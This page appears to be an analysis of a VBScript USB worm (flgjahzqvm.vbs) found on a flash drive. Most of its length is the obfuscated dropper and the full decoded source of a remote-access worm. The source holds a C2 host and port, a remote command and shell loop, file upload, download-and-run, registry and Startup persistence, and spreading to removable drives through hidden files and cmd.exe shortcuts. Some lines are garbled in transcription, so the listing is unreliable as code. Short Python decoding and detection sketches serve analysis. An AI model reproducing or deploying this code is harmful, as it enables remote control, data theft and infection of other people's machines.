Virus Name: flgjahzqvm.vbs

Source: Internet
Author: User

The author recently copied some files on a public computer. On returning and opening the USB drive, its contents had all turned into shortcuts, and a .vbs file was sitting conspicuously in the root directory.

Opening a shortcut's properties shows that its target points to the flgjahzqvm.vbs file first, before the item the shortcut is supposed to open.

The source of the virus file looks like this:

B1= "3"
B2= "9"
B3= "|"
b4= "6"
b5= "0"
B6= "|"
b7= "9"
b8= "1"
B9= "|"
b10= "3"
B11= "2"
B12= "|"
b13= "1"
b14= "1"
B15= "4"
B16= "|"
b17= "1"
b18= "0"
b19= "1"
B20= "|"
b21= "9"
B22= "9"
B23= "|"
b24= "1"
b25= "1"
b26= "1"
B27= "|"
b28= "1"
b29= "0"
b30= "0"
B31= "|"
B32= "1"
b33= "0"
b34= "1"
B35= "|"
b36= "1"
b37= "1"
B38= "4"
B39= "|"
b40= "3"
B41= "2"
B42= "|"
b43= "5"
B44= "8"
B45= "|"
b46= "3"
b47= "2"
B48= "|"
b49= "1"
b50= "0"
b1 = b1 & b2 & b3 & b4 & b5 & b6 & b7 & b8 & b9 & b10 & b11 & b12 & b13 & b14 & b15 & b16 & b17 & b18 & b19 & b20 & b21 & b22 & b23 & b24 & b25 & b26 & b27 & b28 & b29 & b30 & b31 & b32 & b33 & b34 & b35 & b36 & b37 & b38 & b39 & b40 & b41 & b42 & b43 & b44 & b45 & b46 & b47 & b48 & b49 & b50
B51= "4"
B52= "|"
b53= "1"
b54= "1"
b55= "1"
B56= "|"
b57= "1"
b58= "1"
b59= "7"
B60= "|"
b61= "1"
b62= "0"
b63= "0"
B64= "|"
b65= "1"
b66= "0"
b67= "5"
B68= "|"
b69= "1"
b70= "1"
b71= "0"
B72= "|"
b73= "1"
b74= "0"
b75= "5"
B76= "|"
b77= "3"
b78= "2"
B79= "|"
B80= "4"
b81= "0"
B82= "|"
b83= "9"
b84= "9"
B85= "|"
B86= "4"
b87= "1"
B88= "|"
b89= "3"
b90= "2"
B91= "|"
B92= "1"
b93= "1"
b94= "5"
B95= "|"
b96= "1"
b97= "0"
b98= "7"
B99= "|"
b100= "1"
b1 = b1 & b51 & b52 & b53 & b54 & b55 & b56 & b57 & b58 & b59 & b60 & b61 & b62 & b63 & b64 & b65 & b66 & b67 & b68 & b69 & b70 & b71 & b72 & b73 & b74 & b75 & b76 & b77 & b78 & b79 & b80 & b81 & b82 & b83 & b84 & b85 & b86 & b87 & b88 & b89 & b90 & b91 & b92 & b93 & b94 & b95 & b96 & b97 & b98 & b99 & b100
B101= "2"
B102= "1"
B103= "|"
b104= "1"
b105= "1"
b106= "2"
B107= "|"
b108= "1"
b109= "0"
b110= "1"
B111= "|"
B112= "3"
b113= "2"
B114= "|"
b115= "5"
B116= "8"
B117= "|"
b118= "3"
b119= "2"
B120= "|"
b121= "1"

......

B1 = SPLIT (B1, "|")
For I = 0 to UBOUND (B1)-1
NJ = NJ & CHR (B1 (I))
NEXT
Executeglobal (NJ)

At first glance it is nothing but a pile of variables. Confusing, isn't it?

In fact, the script stores its real code as a string split into single characters, one per variable, in order to evade antivirus detection.
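For analysis, the same string can be rebuilt statically, without ever running the script. The following Python sketch is an added example, not part of the original post: `decode_dropper` and the short `SAMPLE` input are constructed for illustration, and the parser assumes the one-assignment-per-line layout shown above.

```python
import re

# Constructed sample in the dropper's layout (not the page's payload).
# Note that b1 is both the first digit and the running accumulator.
SAMPLE = '''\
b1= "3"
b2= "9"
b3= "|"
b4= "3"
b5= "2"
b1 = b1 & b2 & b3 & b4 & b5
b6= "|"
b7= "1"
b8= "2"
b9= "0"
b10= "|"
b1 = b1 & b6 & b7 & b8 & b9 & b10
b1 = Split(b1, "|")
'''

ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
CONCAT = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*&\s*\w+)+)\s*$')

def decode_dropper(source: str) -> str:
    """Statically rebuild the string the dropper would pass to ExecuteGlobal."""
    env, target = {}, None
    for line in source.splitlines():
        if m := ASSIGN.match(line):
            env[m.group(1).lower()] = m.group(2)  # VBScript names are case-insensitive
        elif m := CONCAT.match(line):
            parts = re.split(r'\s*&\s*', m.group(2))
            # Statements are replayed in order because the accumulator is overwritten.
            env[m.group(1).lower()] = "".join(env.get(p.lower(), "") for p in parts)
            target = m.group(1).lower()
    if target is None:
        raise ValueError("no concatenation statement found")
    # The script loops 0 .. UBound-1, so the last Split element is dropped.
    codes = env[target].split("|")[:-1]
    return "".join(chr(int(c)) for c in codes if c.isdigit())

if __name__ == "__main__":
    print(repr(decode_dropper(SAMPLE)))
```

The decoded text is only returned as a string, so the sample can be inspected or written to a report without any script host being involved.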

This is what it looks like after decoding:

' <[Recoder:houdini (c) Skype:houdini-fx]>

' =-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Host = "Medoutil.zapto.org"
Port = 88
InstallDir = "%temp%"
Lnkfile = True
Lnkfolder = True

' =-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

Dim shellobj
Set shellobj = WScript.CreateObject ("Wscript.Shell")
Dim filesystemobj
Set filesystemobj = CreateObject ("Scripting.FileSystemObject")
Dim httpobj
Set httpobj = CreateObject ("Msxml2.xmlhttp")


' =-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

Installname = WScript.ScriptName
startup = Shellobj.specialfolders ("Startup") & "\"
InstallDir = Shellobj.expandenvironmentstrings (installdir) & "\"
If not filesystemobj.folderexists (installdir) Then installdir = Shellobj.expandenvironmentstrings ("%temp%") & "\"
Spliter = "<" & "|" & ">"
Sleep = 5000
Dim response
Dim cmd
Dim param
info = ""
usbspreading = ""
StartDate = ""
Dim oneonce

' =-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
On Error Resume Next


Instance
While True

Install

Response = ""
Response = post ("Is-ready", "" ")
cmd = Split (Response,spliter)
Select Case cmd (0)
Case "Excecute"
param = cmd (1)
Execute param
Case "Update"
param = cmd (1)
Oneonce.close
Set oneonce = Filesystemobj.opentextfile (InstallDir & Installname, 2, false)
Oneonce.write param
Oneonce.close
Shellobj.run "Wscript.exe//b" & Chr & installdir & Installname & Chr (34)
Wscript.Quit
Case "Uninstall"
Uninstall
Case "Send"
Download cmd (1), cmd (2)
Case "Site-send"
Sitedownloader cmd (1), cmd (2)
Case "Recv"
param = cmd (1)
Upload (param)
Case "Enum-driver"
Post "Is-enum-driver", Enumdriver
Case "ENUM-FAF"
param = cmd (1)
Post "IS-ENUM-FAF", ENUMFAF (param)
Case "Enum-process"
Post "Is-enum-process", enumprocess
Case "Cmd-shell"
param = cmd (1)
Post "Is-cmd-shell", Cmdshell (param)
Case "Delete"
param = cmd (1)
DELETEFAF (param)
Case "Exit-process"
param = cmd (1)
ExitProcess (param)
Case "Sleep"
param = cmd (1)
sleep = eval (param)
End Select

Wscript.Sleep Sleep

Wend


Sub Install
On Error Resume Next
Dim lnkobj
Dim filename
Dim foldername
Dim Fileicon
Dim Foldericon

Upstart
In Filesystemobj.drives

If Drive.isready = True Then
If drive.freespace > 0 Then
If Drive.drivetype = 1 Then
Filesystemobj.copyfile wscript.scriptfullname, Drive.path & "\" & Installname,true
If Filesystemobj.fileexists (Drive.path & "\" & Installname) Then
Filesystemobj.getfile (Drive.path & "\" & installname). attributes = 2+4
End If
For each of the file in Filesystemobj.getfolder (Drive.path & "\"). Files
If not lnkfile then exit for
If InStr (File.name, ".") Then
If LCase (Split (File.name, ".") (UBound (Split (File.name, ".")))) <> "LNK" then
File.attributes = 2+4
If UCase (file.name) <> UCase (installname) Then
filename = Split (File.name, ".")
Set lnkobj = Shellobj.createshortcut (Drive.path & "\" & filename (0) & ". Lnk")
Lnkobj.windowstyle = 7
Lnkobj.targetpath = "cmd.exe"
Lnkobj.workingdirectory = ""
Lnkobj.arguments = "/C Start" & Replace (Installname, "", ChrW & "" & ChrW) & "&start" & Replace (File.name, "", ChrW & "" & ChrW) & "&exit"
Fileicon = Shellobj.regread ("hkey_local_machine\software\classes\" & Shellobj.regread ("HKEY_LOCAL_MACHINE\ Software\classes\. "& Split (File.name,". ") (UBound (Split (File.name, "."))) & "\") & "\defaulticon\")
If InStr (Fileicon, ",") = 0 Then
Lnkobj.iconlocation = File.path
Else
Lnkobj.iconlocation = Fileicon
End If
Lnkobj.save ()
End If
End If
End If
Next
For each folder in Filesystemobj.getfolder (Drive.path & "\"). Subfolders
If not Lnkfolder then exit for
Folder.attributes = 2+4
FolderName = Folder.name
Set lnkobj = Shellobj.createshortcut (Drive.path & "\" & FolderName & ". Lnk")
Lnkobj.windowstyle = 7
Lnkobj.targetpath = "cmd.exe"
Lnkobj.workingdirectory = ""
Lnkobj.arguments = "/C Start" & Replace (Installname, "", ChrW) & "" & ChrW "&" &start Explore R "& Replace (Folder.name," ", ChrW &" "& ChrW) &" &exit "
Foldericon = Shellobj.regread ("hkey_local_machine\software\classes\folder\defaulticon\")
If InStr (Foldericon, ",") = 0 Then
Lnkobj.iconlocation = Folder.path
Else
Lnkobj.iconlocation = Foldericon
End If
Lnkobj.save ()
Next
End If
End If
End If
Next
Err.Clear
End Sub

Sub Uninstall
On Error Resume Next
Dim filename
Dim foldername

Shellobj.regdelete "hkey_current_user\software\microsoft\windows\currentversion\run\" & Split (Installname, ".") (0)
Shellobj.regdelete "hkey_local_machine\software\microsoft\windows\currentversion\run\" & Split (Installname, ".") (0)
Filesystemobj.deletefile Startup & Installname, True
Filesystemobj.deletefile Wscript.scriptfullname, True

In Filesystemobj.drives
If Drive.isready = True Then
If drive.freespace > 0 Then
If Drive.drivetype = 1 Then
For each file in Filesystemobj.getfolder (Drive.path & "\"). Files
On Error Resume Next
If InStr (File.name, ".") Then
If LCase (Split (File.name, ".") (UBound (Split (File.name, ".")))) <> "LNK" then
File.attributes = 0
If UCase (file.name) <> UCase (installname) Then
filename = Split (File.name, ".")
Filesystemobj.deletefile (Drive.path & "\" & filename (0) & ". Lnk")
Else
Filesystemobj.deletefile (Drive.path & "\" & File.name)
End If
Else
Filesystemobj.deletefile (File.path)
End If
End If
Next
For each folder in Filesystemobj.getfolder (Drive.path & "\"). Subfolders
Folder.attributes = 0
Next
End If
End If
End If
Next
Wscript.Quit
End Sub

function post (cmd, param)

Post = param
Httpobj.open "POST", "http://" & "Host &", "& Port &"/"& cmd, False
Httpobj.setrequestheader "User-agent:", information
Httpobj.send param
Post = Httpobj.responsetext
End Function

function information
On Error Resume Next
If inf = "Then"
inf = hwid & Spliter
inf = inf & Shellobj.expandenvironmentstrings ("%computername%") & Spliter
inf = inf & Shellobj.expandenvironmentstrings ("%username%") & Spliter

Set root = GetObject ("Winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set os = Root.execquery ("SELECT * from Win32_OperatingSystem")
For each osinfo in OS
inf = inf & osinfo.caption & Spliter
Exit For
Next
inf = inf & "Plus" & Spliter
INF = inf & security & Spliter
inf = inf & usbspreading
Information = inf
Else
Information = inf
End If
End Function


Sub Upstart ()
On Error Resume Next

Shellobj.regwrite "hkey_current_user\software\microsoft\windows\currentversion\run\" & Split (Installname, ".") (0), "Wscript.exe//b" & ChrW & installdir & Installname & ChrW, "REG_SZ"
Shellobj.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\run\" & Split (Installname, ".") (0), "Wscript.exe//b" & ChrW & installdir & Installname & ChrW, "REG_SZ"
Filesystemobj.copyfile Wscript.scriptfullname,installdir & Installname,true
Filesystemobj.copyfile Wscript.scriptfullname,startup & Installname, True

End Sub


function Hwid
On Error Resume Next

Set root = GetObject ("Winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set disks = Root.execquery ("SELECT * from Win32_LogicalDisk")
For each disk in disks
If Disk.volumeserialnumber <> "then
Hwid = Disk.volumeserialnumber
Exit For
End If
Next
End Function


function security
On Error Resume Next

Security = ""

Set objWMIService = GetObject ("Winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set colitems = objWMIService.ExecQuery ("SELECT * from Win32_OperatingSystem", 48)
For each objitem in colitems
Versionstr = Split (Objitem.version, ".")
Next
Versionstr = Split (Colitems.version, ".")
OSVersion = versionstr (0) & "."
For x = 1 To UBound (VERSIONSTR)
OSVersion = osversion & Versionstr (i)
Next
OSVersion = eval (osversion)
If osversion > 6 then sc = "Securitycenter2" Else sc = "SecurityCenter"

Set Objsecuritycenter = GetObject ("winmgmts:\\localhost\root\" & SC)
Set Colantivirus = Objsecuritycenter.execquery ("SELECT * from Antivirusproduct", "WQL", 0)

For each objantivirus in Colantivirus
Security = security & Objantivirus.displayname & "."
Next
If security = "then Security =" Nan-av "
End Function


function instance
On Error Resume Next

usbspreading = Shellobj.regread ("hkey_local_machine\software\" & Split (Installname, ".") (0) & "\")
If usbspreading = "Then
If LCase (Mid (wscript.scriptfullname,2)) = ": \" & LCase (Installname) Then
usbspreading = "true-" & Date
Shellobj.regwrite "Hkey_local_machine\software\" & Split (Installname, ".") (0) & "\", Usbspreading, "REG_SZ"
Else
Usbspreading = "false-" & Date
Shellobj.regwrite "Hkey_local_machine\software\" & Split (Installname, ".") (0) & "\", Usbspreading, "REG_SZ"

End If
End If

Upstart
Set scriptfullnameshort = Filesystemobj.getfile (wscript.scriptfullname)
Set installfullnameshort = Filesystemobj.getfile (InstallDir & Installname)
If LCase (Scriptfullnameshort.shortpath) <> LCase (Installfullnameshort.shortpath) Then
Shellobj.run "Wscript.exe//b" & Chr & installdir & Installname & Chr (34)
Wscript.Quit
End If
Err.Clear
Set oneonce = Filesystemobj.opentextfile (InstallDir & Installname, 8, false)
If Err.Number > 0 Then Wscript.Quit
End Function


Sub Sitedownloader (Fileurl,filename)

Strlink = FileURL
Strsaveto = installdir & filename
Set objhttpdownload = CreateObject ("Msxml2.xmlhttp")
Objhttpdownload.open "Get", Strlink, False
Objhttpdownload.send

Set objfsodownload = CreateObject ("Scripting.FileSystemObject")
If Objfsodownload.fileexists (Strsaveto) Then
Objfsodownload.deletefile (Strsaveto)
End If

If Objhttpdownload.status =
Dim objstreamdownload
Set objstreamdownload = CreateObject ("ADODB.stream")
With Objstreamdownload
. Type = 1
. Open
. Write Objhttpdownload.responsebody
. SaveToFile Strsaveto
. Close
End With
Set objstreamdownload = Nothing
End If
If Objfsodownload.fileexists (Strsaveto) Then
Shellobj.run Objfsodownload.getfile (strsaveto). ShortPath
End If
End Sub

Sub Download (fileurl,filedir)

If Filedir = "Then
Filedir = InstallDir
End If

Strsaveto = Filedir & Mid (FileURL, InStrRev (FileURL, "\") + 1)
Set objhttpdownload = CreateObject ("Msxml2.xmlhttp")
Objhttpdownload.open "POST", "http://" & Host & "," & Port & "/" & "Is-sending" & spliter & File URL, False
Objhttpdownload.send ""

Set objfsodownload = CreateObject ("Scripting.FileSystemObject")
If Objfsodownload.fileexists (Strsaveto) Then
Objfsodownload.deletefile (Strsaveto)
End If
If Objhttpdownload.status =
Dim objstreamdownload
Set objstreamdownload = CreateObject ("ADODB.stream")
With Objstreamdownload
. Type = 1
. Open
. Write Objhttpdownload.responsebody
. SaveToFile Strsaveto
. Close
End With
Set objstreamdownload = Nothing
End If
If Objfsodownload.fileexists (Strsaveto) Then
Shellobj.run Objfsodownload.getfile (strsaveto). ShortPath
End If
End Sub


function upload (fileurl)

Dim Httpobj,objstreamuploade,buffer
Set Objstreamuploade = CreateObject ("ADODB.stream")
With Objstreamuploade
. Type = 1
. Open
. LoadFromFile FileURL
Buffer =. Read
. Close
End With
Set objstreamdownload = Nothing
Set httpobj = CreateObject ("Msxml2.xmlhttp")
Httpobj.open "POST", "http://" & Host & "," & Port & "/" & "Is-recving" & Spliter & FileURL, FAL Se
Httpobj.send Buffer
End Function


function Enumdriver ()

In Filesystemobj.drives
If Drive.isready = True Then
Enumdriver = enumdriver & Drive.path & "|" & Drive.drivetype & Spliter
End If
Next
End Function

function Enumfaf (enumdir)

ENUMFAF = Enumdir & Spliter
For each folder in Filesystemobj.getfolder (Enumdir). Subfolders
ENUMFAF = ENUMFAF & folder.name & "|" & "&" | "&" D "&" | "& Folder.attributes & Spliter
Next

For each file in Filesystemobj.getfolder (Enumdir). Files
ENUMFAF = ENUMFAF & file.name & "|" & File.size & "|" & "F" & "|" & File.attributes & Spli ter

Next
End Function


function enumprocess ()

On Error Resume Next

Set objWMIService = GetObject ("Winmgmts:\\.\root\cimv2")
Set colitems = objWMIService.ExecQuery ("SELECT * from Win32_Process", 48)

Dim objitem
For each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & Objitem.executablepath & Spliter
Next
End Function

Sub ExitProcess (PID)
On Error Resume Next

Shellobj.run "taskkill/f/t/pid" & Pid,7,true
End Sub

Sub Deletefaf (URL)
On Error Resume Next

Filesystemobj.deletefile URL
Filesystemobj.deletefolder URL

End Sub

function Cmdshell (cmd)

Dim Httpobj,oexec,readallfromany

Set oexec = Shellobj.exec ("%comspec%/C" & cmd)
If not Oexec.stdout.atendofstream then
Readallfromany = Oexec.stdout.readall
ElseIf not Oexec.stderr.atendofstream Then
Readallfromany = Oexec.stderr.readall
Else
Readallfromany = ""
End If

Cmdshell = Readallfromany
End Function
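The Install routine in the listing above gives every file and folder on a removable drive the attributes 2+4 (hidden + system) and drops a same-named .lnk beside it, which is exactly the symptom described at the top of the page. As an added example (not part of the original post), this Python check flags that pattern in a drive-root listing; `triage`, `list_root` and the sample entries are constructed for illustration, and only the script name comes from the page.

```python
import os

HIDDEN_SYSTEM = 0x2 | 0x4          # the "2+4" the script assigns to files and folders
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".wsf")

def list_root(path):
    """Return (name, attributes, is_dir) for each entry of a drive root (Windows only)."""
    return [(e.name, e.stat().st_file_attributes, e.is_dir()) for e in os.scandir(path)]

def triage(entries):
    """Flag hidden+system entries that are scripts or are shadowed by a .lnk."""
    names = {name.lower() for name, _, _ in entries}
    findings = []
    for name, attrs, is_dir in entries:
        if attrs & HIDDEN_SYSTEM != HIDDEN_SYSTEM:
            continue                                   # visible entry, not touched
        ext = os.path.splitext(name)[1].lower()
        # The script names the shortcut after Split(name, ".")(0) for files
        # and after the full name for folders.
        stem = name if is_dir else name.split(".")[0]
        if not is_dir and ext in SCRIPT_EXTS:
            findings.append(("hidden-script", name))
        elif (stem + ".lnk").lower() in names:
            findings.append(("hidden-behind-shortcut", name))
    return findings

# Constructed listing of an affected drive root: (name, attribute bits, is_dir).
ENTRIES = [
    ("flgjahzqvm.vbs", 0x26, False),   # archive + hidden + system
    ("report.docx",    0x26, False),
    ("report.lnk",     0x20, False),
    ("photos",         0x16, True),    # directory + hidden + system
    ("photos.lnk",     0x20, False),
    ("notes.txt",      0x20, False),   # untouched file
]

if __name__ == "__main__":
    for kind, name in triage(ENTRIES):
        print(kind, name)
```

On a Windows analysis host, `triage(list_root("E:\\"))` applies the same check to a mounted drive; the drive letter is an assumption.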
